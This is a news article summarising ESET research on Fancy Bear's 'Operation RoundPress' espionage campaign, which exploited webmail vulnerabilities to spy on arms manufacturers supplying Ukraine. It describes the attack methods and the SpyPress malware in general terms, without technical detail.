Russian hackers very active: Fancy Bear attacks Ukrainian arms suppliers

Soviet weapons manufacturers outside Russia are the backbone of Ukraine's defense. But these companies in Bulgaria, Romania, and Ukraine itself are apparently easy prey for Fancy Bear, a notorious Kremlin hacking team.

The notorious Russian hacker group Fancy Bear has targeted arms companies that supply weapons to Ukraine. This is according to a recent study by the German security company Eset, based in Jena. According to the study, the attacks primarily targeted Soviet weapons manufacturers in Bulgaria, Romania, and Ukraine, which play a key role in the defense against the Russian invasion. However, arms factories in Africa and South America were also affected.

The hacker group Fancy Bear is also known as Sednit or APT28. It is also allegedly responsible for the attacks on the German Bundestag in 2015, US politician Hillary Clinton a year later, and the SPD party headquarters in 2023. Experts believe the group is part of a larger strategy by Russian intelligence services to use cyberattacks as a means of political influence and destabilization. In addition to espionage, the focus is also on targeted disinformation campaigns directed against Western democracies.

In the current espionage campaign, dubbed "Operation RoundPress," hackers exploited vulnerabilities in popular webmail software, including Roundcube, Zimbra, Horde, and MDaemon. Several vulnerabilities could have been eliminated through proper software maintenance. In one case, however, the affected companies were virtually powerless because the attackers were able to exploit a previously unknown security vulnerability in MDaemon that could not initially be fixed.

According to ESET researchers, the attacks were typically launched with manipulated emails disguised as news reports. The senders appear to be reputable sources such as the Kyiv Post or the Bulgarian news portal News.bg. As soon as the email is opened in the browser, a hidden malicious code is launched, successfully bypassing spam filters.

The experts from Jena were able to identify the malware "SpyPress.MDAEMON" during their analysis of the attacks. The hacker program is not only capable of reading login credentials and tracking emails, but can even circumvent two-factor authentication. Two-factor authentication (2FA for short) is an additional security measure when logging into online accounts or accessing sensitive data. It ensures that not only one password is sufficient to gain access, but a second verification is required. However, the Fancy Bear hackers managed to bypass the 2FA protection in several cases and gain permanent access to mailboxes using so-called application passwords.

"Many companies operate outdated webmail servers," said ESET researcher Matthieu Faou. "Even simply displaying an email in a browser can be enough to execute malicious code without the recipient actively clicking anything."